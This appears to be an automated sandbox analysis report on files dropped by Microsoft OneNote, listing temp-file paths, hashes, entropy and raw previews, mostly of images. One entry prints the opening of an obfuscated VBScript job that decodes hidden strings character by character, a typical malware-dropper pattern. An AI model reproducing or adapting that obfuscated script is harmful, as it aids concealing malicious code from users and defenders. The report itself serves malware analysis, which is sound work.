Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{981820F5-825C-4C65-87E7-FB875AA878F0}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{985B8E2A-5C23-4F1A-9FCA-821D15293660}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{98E1E656-C046-4CCB-BFA7-4B7076825F72}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Temp\{996E8EA4-7A2B-45C1-9070-16CEF16B9709}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{998DA5C4-497E-4DDC-B60A-1C2141192C1D}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{9C2F9649-2B35-4495-A913-2A1E2AC1DA95}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{9C9D98B7-8052-4B25-BBAF-0B6DB4990726}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{9E2274A0-32C1-4045-984E-3B8021F012AD}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{9E738882-FB5A-4BA8-8D44-D552A85AD92C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{9F275B62-58AA-4E86-96DC-D3C595844DD5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	HTML document, ASCII text, with very long lines (792), with CRLF line terminators
Category:	dropped
Size (bytes):	55113
Entropy (8bit):	5.216959514455489
Encrypted:	false
SSDEEP:	768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
MD5:	AE25F2104967B2708AC9DBA80AAC52FD
SHA1:	7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
SHA-256:	11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
SHA-512:	D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
Malicious:	false
Preview:	<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

C:\Users\user\AppData\Local\Temp\{A0A98CDB-F7D2-45A4-BAB3-9BA576E9AB7B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{A0E28E11-8D63-4957-9320-1B28EE5291B2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{A308423F-0EF1-48E1-A3BE-762E8F58768B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Temp\{A4D170B5-E087-4FD7-B354-F8CDDFE94C2A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{A5692402-7EEA-4829-B57C-A7475266DF4F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
